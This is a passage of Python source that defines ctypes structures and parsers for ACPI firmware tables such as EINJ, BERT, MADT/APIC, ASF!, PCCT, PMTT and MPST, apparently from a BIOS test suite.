_fields_ = [
('error_type', error_type_flags),
('vendor_error_type_extension_structure_offset', ctypes.c_uint32),
('flags', set_error_type_with_addr_flags),
('apic_id', ctypes.c_uint32),
('memory_address', ctypes.c_uint64),
('memory_address_range', ctypes.c_uint64),
('pcie_sbdf', pcie_sbdf_struct),
]
class vendor_error_type_extension(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('length', ctypes.c_uint32),
('sbdf', pcie_sbdf_struct),
('vendor_id', ctypes.c_uint16),
('device_id', ctypes.c_uint16),
('rev_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
]
class injection_instruction_entry_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('preserve_register', ctypes.c_uint8, 1),
]
class injection_instruction_entry_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', injection_instruction_entry_flags_bits),
]
class InjectionInstructionEntry(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('injection_action', ctypes.c_uint8),
('instruction', ctypes.c_uint8),
('flags', injection_instruction_entry_flags),
('reserved', ctypes.c_uint8),
('register_region', GAS),
('value', ctypes.c_uint64),
('mask', ctypes.c_uint64),
]
_formats = {
'injection_action' : unpack.format_table("{}", _error_injection_action),
'instruction' : unpack.format_table("{}", _error_injection_instruction),
}
def einj_factory(num_entries):
"""Create variable-sized EINJ table based on the number of injection instruction entries."""
class EINJ(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('injection_header_size', ctypes.c_uint32),
('injection_flags', ctypes.c_uint8),
('reserved', 3 * ctypes.c_uint8),
('injection_entry_count', ctypes.c_uint32),
('entries', num_entries * InjectionInstructionEntry),
]
return EINJ
def EINJ(val):
"""Create class based on decode of an EINJ table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_entries = (hdr.length - ctypes.sizeof(einj_factory(0))) / ctypes.sizeof(InjectionInstructionEntry)
if isinstance(val, str):
return einj_factory(num_entries).from_buffer_copy(data)
return einj_factory(num_entries).from_address(addr)
parse_einj = make_compat_parser("EINJ")
class error_severity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('correctable', ctypes.c_uint32, 1),
('fatal', ctypes.c_uint32, 1),
('corrected', ctypes.c_uint32, 1),
('none', ctypes.c_uint32, 1),
('reserved', ctypes.c_uint32, 28),
]
class error_severity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', error_severity_flags_bits),
]
class generic_error_data_entry(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('section_type', bits.cdata.GUID),
('error_severity', error_severity_flags),
('revision', ctypes.c_uint16),
('validation_bits', ctypes.c_uint8),
('flags', ctypes.c_uint8),
('error_data_length', ctypes.c_uint32),
#('FRU_id', ?),
('FRU_text', ctypes.c_uint8),
#('data', array of generic_error_data),
]
class block_status_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('uncorrectable_error_valid', ctypes.c_uint32, 1),
('correctable_error_valid', ctypes.c_uint32, 1),
('multiple_uncorrectable_errors', ctypes.c_uint32, 1),
('multiple_correctable_errors', ctypes.c_uint32, 1),
('error_data_entry_count', ctypes.c_uint32, 10),
('reserved', ctypes.c_uint32, 18),
]
class block_status_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', block_status_flags_bits),
]
class boot_error_region(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('block_status', block_status_flags),
('raw_data_offset', ctypes.c_uint32),
('raw_data_length', ctypes.c_uint32),
('data_length', ctypes.c_uint32),
('error_severity', error_severity_flags),
('generic_error_data', generic_error_data_entry),
]
class BERT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('boot_error_region_length', ctypes.c_uint32),
('boot_error_region', ctypes.c_uint64),
]
def BERT(val):
"""Create class based on decode of an BERT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return BERT_v1.from_buffer_copy(data)
return BERT_v1.from_address(addr)
parse_bert = make_compat_parser("BERT")
class APICSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('length', ctypes.c_uint8),
]
class local_apic_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
]
class local_apic_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', local_apic_flags_bits),
]
class APICSubtableLocalApic(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('proc_id', ctypes.c_uint8),
('apic_id', ctypes.c_uint8),
('flags', local_apic_flags),
]
class APICSubtableIOApic(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('io_apic_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8),
('io_apic_addr', ctypes.c_uint32),
('global_sys_int_base', ctypes.c_uint32),
]
mps_inti_polarity = {
0b00: 'Conforms to bus specifications',
0b01: 'Active high',
0b11: 'Active low',
}
mps_inti_trigger_mode = {
0b00: 'Conforms to bus specifications',
0b01: 'Edge-triggered',
0b11: 'Level-triggered',
}
class APICSubtable_int_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('polarity', ctypes.c_uint16, 2),
('trigger_mode', ctypes.c_uint16, 2),
]
_formats = {
'polarity': unpack.format_table("{}", mps_inti_polarity),
'trigger_mode': unpack.format_table("{}", mps_inti_trigger_mode),
}
class APICSubtable_int_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', APICSubtable_int_flags_bits),
]
class APICSubtableNmiIntSrc(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('flags', APICSubtable_int_flags),
('global_sys_interrupt', ctypes.c_uint32),
]
class APICSubtableLocalApicNmi(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('proc_id', ctypes.c_uint8),
('flags', APICSubtable_int_flags),
('lint_num', ctypes.c_uint8),
]
class APICSubtableIntSrcOverride(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('bus', ctypes.c_uint8),
('source', ctypes.c_uint8),
('global_sys_interrupt', ctypes.c_uint32),
('flags', APICSubtable_int_flags)
]
class APICSubtableLocalx2Apic(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('reserved', ctypes.c_uint16),
('x2apicid', ctypes.c_uint32),
('flags', local_apic_flags),
('uid', ctypes.c_uint32),
]
class APICSubtableLocalx2ApicNmi(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('flags', APICSubtable_int_flags),
('uid', ctypes.c_uint32),
('lint_num', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
]
_performance_interrupt_mode = {
0: 'Level-triggered',
1: 'Edge-triggered',
}
class APICSubtableLocalGIC_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
('performance_interrupt_mode', ctypes.c_uint32, 1),
]
_formats = {
'performance_interrupt_mode': unpack.format_table("{}", mps_inti_polarity),
}
class APICSubtableLocalGIC_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', APICSubtableLocalGIC_flags_bits),
]
class APICSubtableLocalGIC(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('reserved', ctypes.c_uint16),
('gic_id', ctypes.c_uint32),
('uid', ctypes.c_uint32),
('flags', APICSubtableLocalGIC_flags),
('parking_protocol_version', ctypes.c_uint32),
('performance_interrupt_gsiv', ctypes.c_uint32),
('parked_address', ctypes.c_uint64),
('physical_base_adddress', ctypes.c_uint64),
]
class APICSubtableLocalGICDistributor(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(APICSubtable._fields_) + [
('reserved1', ctypes.c_uint16),
('gic_id', ctypes.c_uint32),
('physical_base_adddress', ctypes.c_uint64),
('system_vector_base', ctypes.c_uint32),
('reserved2', ctypes.c_uint32),
]
def APICSubtableUnknown_factory(_len):
class APICSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = APICSubtable._fields_ + [
('data', ctypes.c_uint8 * _len),
]
return APICSubtableUnknown
MADT_TYPE_LOCAL_APIC = 0
MADT_TYPE_IO_APIC = 1
MADT_TYPE_INT_SRC_OVERRIDE = 2
MADT_TYPE_NMI_INT_SRC = 3
MADT_TYPE_LOCAL_APIC_NMI = 4
MADT_TYPE_LOCAL_X2APIC = 9
MADT_TYPE_LOCAL_X2APIC_NMI = 0xA
MADT_TYPE_LOCAL_GIC = 0xB
MADT_TYPE_LOCAL_GIC_DISTRIBUTOR = 0xC
class APIC_table_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pcat_compat', ctypes.c_uint32, 1),
]
class APIC_table_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', APIC_table_flags_bits),
]
def apic_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class APIC_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('local_apic_address', ctypes.c_uint32),
('flags', APIC_table_flags),
('interrupt_controller_structures', subtables),
]
@property
def procid_apicid(self):
procid_apicid_dict = {}
for subtable in self.interrupt_controller_structures:
# accumulate the dictionary
if subtable.subtype == MADT_TYPE_LOCAL_APIC:
if subtable.flags.bits.enabled == 1:
procid_apicid_dict[subtable.proc_id] = subtable.apic_id
return procid_apicid_dict
@property
def uid_x2apicid(self):
uid_x2apicid_dict = {}
for subtable in self.interrupt_controller_structures:
# accumulate the dictionary
if subtable.subtype == MADT_TYPE_LOCAL_X2APIC:
if subtable.flags.bits.enabled == 1:
uid_x2apicid_dict[subtable.uid] = subtable.x2apicid
return uid_x2apicid_dict
return APIC_v3
def apic_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
while addr < end:
subtable_num += 1
subtable = APICSubtable.from_address(addr)
addr += subtable.length
if subtable.subtype == MADT_TYPE_LOCAL_APIC:
cls = APICSubtableLocalApic
elif subtable.subtype == MADT_TYPE_IO_APIC:
cls = APICSubtableIOApic
elif subtable.subtype == MADT_TYPE_INT_SRC_OVERRIDE:
cls = APICSubtableIntSrcOverride
elif subtable.subtype == MADT_TYPE_NMI_INT_SRC:
cls = APICSubtableNmiIntSrc
elif subtable.subtype == MADT_TYPE_LOCAL_APIC_NMI:
cls = APICSubtableLocalApicNmi
elif subtable.subtype == MADT_TYPE_LOCAL_X2APIC:
cls = APICSubtableLocalx2Apic
elif subtable.subtype == MADT_TYPE_LOCAL_X2APIC_NMI:
cls = APICSubtableLocalx2ApicNmi
elif subtable.subtype == MADT_TYPE_LOCAL_GIC:
cls = APICSubtableLocalGIC
elif subtable.subtype == MADT_TYPE_LOCAL_GIC_DISTRIBUTOR:
cls = APICSubtableLocalGICDistributor
else:
cls = APICSubtableUnknown_factory(subtable.length - ctypes.sizeof(APICSubtable))
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def APIC(val):
"""Create class based on decode of an APIC table from address or filename."""
preamble_length = ctypes.sizeof(apic_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
subtable_list = apic_subtable_list(addr + preamble_length, hdr.length - preamble_length)
if isinstance(val, str):
return apic_factory(subtable_list).from_buffer_copy(data)
return apic_factory(subtable_list).from_address(addr)
def parse_apic(printflag=False, EnabledOnly=False, instance=1):
"""Parse and optionally print an ACPI MADT table."""
apic = parse_table("APIC", instance)
if apic is None:
return None, None
if printflag:
with ttypager.page():
print apic
if EnabledOnly:
with ttypager.page():
print '\n'.join(str(subtable) for subtable in apic.interrupt_controller_structures if ((subtable.subtype in (MADT_TYPE_LOCAL_APIC, MADT_TYPE_LOCAL_X2APIC)) and subtable.flags.bits.enabled))
return apic
def _mat_factory(field_list):
class _mat_subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
return _mat_subtables
def _MAT(mat_buffer):
"""Multiple APIC Table Entry"""
buf = ctypes.create_string_buffer(mat_buffer, len(mat_buffer))
addr = ctypes.addressof(buf)
subtable_list = apic_subtable_list(addr, len(buf))
return _mat_factory(subtable_list).from_buffer_copy(buf)
def parse_mat(mat_data):
"""Parse Multiple APIC Table Entry"""
return _MAT(mat_data)
class ASFSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('record_type', ctypes.c_uint8, 7),
('last_record', ctypes.c_uint8, 1),
('reserved', ctypes.c_uint8),
('record_length', ctypes.c_uint16),
]
def ASF_subtable_unknown_factory(data_len):
class ASFSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return ASFSubtableUnknown
class ASF_info_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('smbus_support', ctypes.c_uint8, 1),
]
class ASF_info_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_info_flags_bits),
]
class fixed_smbus_address(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('ASF_compliant_device', ctypes.c_uint8, 1),
('address', ctypes.c_uint8, 7),
]
class ASF_info_record(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('min_watchdog_reset_value', ctypes.c_uint8),
('min_pollng_interval', ctypes.c_uint8),
('system_id', ctypes.c_uint16),
('iana_manufacturer_id', ctypes.c_uint8 * 4),
('flags', ASF_info_flags),
('reserved2', ctypes.c_uint8 * 3),
]
class ASF_ALERTDATA(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('device_address', ctypes.c_uint8),
('command', ctypes.c_uint8),
('data_mask', ctypes.c_uint8),
('compare_value', ctypes.c_uint8),
('event_sensor_type', ctypes.c_uint8),
('event_type', ctypes.c_uint8),
('event_offset', ctypes.c_uint8),
('event_source_type', ctypes.c_uint8),
('event_severity', ctypes.c_uint8),
('sendor_number', ctypes.c_uint8),
('entity', ctypes.c_uint8),
('entity_instance', ctypes.c_uint8),
]
def ASF_alrt_factory(num_alerts):
class ASF_ALRT(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('assertion_event_mask', ctypes.c_uint8),
('deassertion_event_mask', ctypes.c_uint8),
('number_alerts', ctypes.c_uint8),
('array_element_length', ctypes.c_uint8),
('device_array', ASF_ALERTDATA * num_alerts),
]
return ASF_ALRT
class ASF_CONTROLDATA(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('function', ctypes.c_uint8),
('device_address', ctypes.c_uint8),
('command', ctypes.c_uint8),
('data_value', ctypes.c_uint8),
]
def ASF_rctl_factory(num_controls):
class ASF_RCTL(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('number_controls', ctypes.c_uint8),
('array_element_length', ctypes.c_uint8),
('reserved2', ctypes.c_uint16),
('control_array', ASF_CONTROLDATA * num_controls),
]
return ASF_RCTL
class ASF_boot_options_capabilities_1_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('firmware_verbosity_screen_blank', ctypes.c_uint8, 1),
('power_button_lock', ctypes.c_uint8, 1),
('reset_button_lock', ctypes.c_uint8, 1),
('reserved_4_3', ctypes.c_uint8, 2),
('lock_keyboard', ctypes.c_uint8, 1),
('sleep_button_lock', ctypes.c_uint8, 1),
('reserved_7', ctypes.c_uint8, 1),
]
class ASF_boot_options_capabilities_1(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_boot_options_capabilities_1_bits),
]
class ASF_boot_options_capabilities_2_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('reserved_2_0', ctypes.c_uint8, 3),
('user_password_bypass', ctypes.c_uint8, 1),
('forced_progress_events', ctypes.c_uint8, 1),
('firmware_verbosity_verbose', ctypes.c_uint8, 1),
('firmware_verbosity_quiet', ctypes.c_uint8, 1),
('configuration_data_reset', ctypes.c_uint8, 1),
]
class ASF_boot_options_capabilities_2(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_boot_options_capabilities_2_bits),
]
class ASF_special_commands_2_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('force_pxe_boot', ctypes.c_uint8, 1),
('force_hard_drive_boot', ctypes.c_uint8, 1),
('force_hard_drive_safe_mode_boot', ctypes.c_uint8, 1),
('force_diagnostic_boot', ctypes.c_uint8, 1),
('force_cd_dvd_boot', ctypes.c_uint8, 1),
('reserved', ctypes.c_uint8, 3),
]
class ASF_special_commands_2(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_special_commands_2_bits),
]
class ASF_system_capabilities_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('power_cycle_reset_only_on_secure_port', ctypes.c_uint8, 1),
('power_down_only_on_secure_port', ctypes.c_uint8, 1),
('power_on_only_on_secure_port', ctypes.c_uint8, 1),
('reset_only_on_secure_port', ctypes.c_uint8, 1),
('power_cycle_reset_on_compat_or_secure_port', ctypes.c_uint8, 1),
('power_down_on_compat_or_secure_port', ctypes.c_uint8, 1),
('power_on_via_compat_or_secure_port', ctypes.c_uint8, 1),
('reset_only_on_compat_or_secure_port', ctypes.c_uint8, 1),
]
class ASF_system_capabilities(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_system_capabilities_bits),
]
class ASF_rmcp(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('boot_options_capabilities_1', ASF_boot_options_capabilities_1),
('boot_options_capabilities_2', ASF_boot_options_capabilities_2),
('boot_options_capabilities_3', ctypes.c_uint8),
('boot_options_capabilities_4', ctypes.c_uint8),
('special_commands_1', ctypes.c_uint8),
('special_commands_2', ASF_special_commands_2),
('system_capabilities', ASF_system_capabilities),
('completion_code', ctypes.c_uint8),
('iana', ctypes.c_uint8 * 4),
('special_command', ctypes.c_uint8),
('special_command_parameter', ctypes.c_uint8 * 2),
('boot_options', ctypes.c_uint8 * 2),
('oem_parameters', ctypes.c_uint8 * 2),
]
def ASF_addr_record_factory(num_devices):
class ASF_addr_record(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('seeprom_address', ctypes.c_uint8),
('num_devices', ctypes.c_uint8),
('fixed_smbus_addresses', fixed_smbus_address * num_devices),
]
return ASF_addr_record
def ASF_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class ASF_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('information_records', subtables),
]
return ASF_v1
ASF_INFO = 0
ASF_ALRT = 1
ASF_RCTL = 2
ASF_RMCP = 3
ASF_ADDR = 4
def ASF_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
ASF_addr_record_base_len = ctypes.sizeof(ASF_addr_record_factory(0))
ASF_alrt_base = ASF_alrt_factory(0)
ASF_rctl_base = ASF_rctl_factory(0)
while addr < end:
subtable_num += 1
subtable = ASFSubtable.from_address(addr)
if subtable.record_type == ASF_INFO:
cls = ASF_info_record
elif subtable.record_type == ASF_ALRT:
num_alerts = ASF_alrt_base.from_address(addr).number_alerts
cls = ASF_alrt_factory(num_alerts)
elif subtable.record_type == ASF_RCTL:
num_controls = ASF_rctl_base.from_address(addr).number_controls
cls = ASF_rctl_factory(num_controls)
elif subtable.record_type == ASF_RMCP:
cls = ASF_rmcp
elif subtable.record_type == ASF_ADDR:
cls = ASF_addr_record_factory(subtable.record_length - ASF_addr_record_base_len)
else:
cls = (subtable.record_length - ctypes.sizeof(ASFSubtable))
addr += subtable.record_length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def ASF(val):
"""Create class based on decode of an ASF! table from address or filename."""
base_length = ctypes.sizeof(ASF_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = ASF_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return ASF_factory(field_list).from_buffer_copy(data)
return ASF_factory(field_list).from_address(addr)
parse_asf = make_compat_parser("ASF!")
class PCCTSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('length', ctypes.c_uint8),
]
def pcct_subtable_unknown_factory(data_len):
class PCCTSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PCCTSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return PCCTSubtableUnknown
class PCCTGenericCommSubspace(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PCCTSubtable._fields_) + [
('reserved', ctypes.c_uint8 * 6),
('base_address', ctypes.c_uint64),
('mem_range_length', ctypes.c_uint64),
('doorbell_register', GAS),
('doorbell_preserve', ctypes.c_uint64),
('doorbell_write', ctypes.c_uint64),
('nominal_latency', ctypes.c_uint32),
('max_periodic_access_rate', ctypes.c_uint32),
('min_request_turnaround_time', ctypes.c_uint16),
]
class PCCT_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('sci_doorbell', ctypes.c_uint32, 1),
]
class PCCT_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', PCCT_flags_bits),
]
def pcct_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PCCT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('flags', PCCT_flags),
('reserved', ctypes.c_uint64),
('pcc_subspace_structures', subtables),
]
return PCCT_v1
PCCT_GENERIC_COMMUNICATION_SUBSPACE = 0
def pcct_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
while addr < end:
subtable_num += 1
subtable = PCCTSubtable.from_address(addr)
if subtable.subtype == PCCT_GENERIC_COMMUNICATION_SUBSPACE:
cls = PCCTGenericCommSubspace
else:
cls = pcct_subtable_unknown_factory(subtable.length - ctypes.sizeof(PCCTSubtable))
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def PCCT(val):
"""Create class based on decode of an PCCT table from address or filename."""
base_length = ctypes.sizeof(pcct_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = pcct_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return pcct_factory(field_list).from_buffer_copy(data)
return pcct_factory(field_list).from_address(addr)
parse_pcct = make_compat_parser("PCCT")
PMTT_component_memory_type = {
0b00: 'Volatile memory',
0b01: 'Both volatile and non-volatile memory',
0b10: 'Non-volatile memory',
}
class PMTT_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('top_level_aggregator_device', ctypes.c_uint16, 1),
('physical_topology_element', ctypes.c_uint16, 1),
]
_formats = {
'component_memory_type': unpack.format_table("{}", PMTT_component_memory_type),
}
class PMTT_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', PMTT_flags_bits),
]
class PMTTSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('reserved1', ctypes.c_uint8),
('length', ctypes.c_uint16),
('flags', PMTT_flags),
('reserved2', ctypes.c_uint16),
]
def PMTTSubtableSocket_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PMTTSubtableSocket(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('socket_identifier', ctypes.c_uint16),
('reserved', ctypes.c_uint16),
('memory_controller_structures', subtables),
]
return PMTTSubtableSocket
def PMTTSubtableMemController_factory(num_proximity_domains, field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PMTTSubtableMemController(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('read_latency', ctypes.c_uint32),
('write_latency', ctypes.c_uint32),
('read_bandwidth', ctypes.c_uint32),
('write_bandwidth', ctypes.c_uint32),
('optimal_access_unit', ctypes.c_uint16),
('optimal_access_aligment', ctypes.c_uint16),
('reserved', ctypes.c_uint16),
('number_proximity_domains', ctypes.c_uint16),
('domains', (ctypes.c_uint32 * num_proximity_domains)),
('physical_component_identifier_structures', subtables),
]
return PMTTSubtableMemController
class PMTTSubtableDIMM(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('physical_component_id', ctypes.c_uint16),
('reserved', ctypes.c_uint16),
('dimm_size', ctypes.c_uint32),
('smbios_handle', ctypes.c_uint32),
]
def pmtt_subtable_unknown_factory(data_len):
class PMTTSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return PMTTSubtableUnknown
def pmtt_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PMTT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('reserved', ctypes.c_uint32),
('memory_aggregator_device_structures', subtables),
]
return PMTT_v1
PMTT_SOCKET = 0
PMTT_MEMORY_CONTROLLER = 1
PMTT_DIMM = 2
def pmtt_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
skt_base_length = ctypes.sizeof(PMTTSubtableSocket_factory(list()))
mc_base_cls = PMTTSubtableMemController_factory(0, list())
while addr < end:
subtable_num += 1
subtable = PMTTSubtable.from_address(addr)
if subtable.subtype == PMTT_SOCKET:
next_field_list = pmtt_subtable_list(addr + skt_base_length, subtable.length - skt_base_length)
cls = PMTTSubtableSocket_factory(next_field_list)
elif subtable.subtype == PMTT_MEMORY_CONTROLLER:
base_subtable = mc_base_cls.from_address(addr)
base_length = ctypes.sizeof(PMTTSubtableMemController_factory(base_subtable.number_proximity_domains, list()))
next_field_list = pmtt_subtable_list(addr + base_length, subtable.length - base_length)
cls = PMTTSubtableMemController_factory(base_subtable.number_proximity_domains, next_field_list)
elif subtable.subtype == PMTT_DIMM:
cls = PMTTSubtableDIMM
else:
cls = pmtt_subtable_unknown_factory(subtable.length - ctypes.sizeof(PMTTSubtable))
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def PMTT(val):
"""Create class based on decode of an PMTT table from address or filename."""
base_length = ctypes.sizeof(pmtt_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = pmtt_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return pmtt_factory(field_list).from_buffer_copy(data)
return pmtt_factory(field_list).from_address(addr)
parse_pmtt = make_compat_parser("PMTT")
class MPSTMemPowerNode_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint8, 1),
('power_managed', ctypes.c_uint8, 1),
('hot_pluggable', ctypes.c_uint8, 1),
]
class MPSTMemPowerNode_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', MPSTMemPowerNode_flags_bits),
]
class MPSTState(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('value', ctypes.c_uint8),
('information_index', ctypes.c_uint8),
]
def MPSTMemPowerNode_factory(num_power_states, num_physical_components):
class MPSTMemPowerNode(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('flags', MPSTMemPowerNode_flags),
('reserved', ctypes.c_uint8),
('node_id', ctypes.c_uint16),
('length', ctypes.c_uint32),
('base_address_low', ctypes.c_uint32),
('base_address_high', ctypes.c_uint32),
('length_low', ctypes.c_uint32),
('length_high', ctypes.c_uint32),
('num_power_states', ctypes.c_uint32),
('num_physical_components', ctypes.c_uint32),
('memory_power_nodes', MPSTState * num_power_states),
('physical_component_ids', ctypes.c_uint16 * num_physical_components),
]
return MPSTMemPowerNode
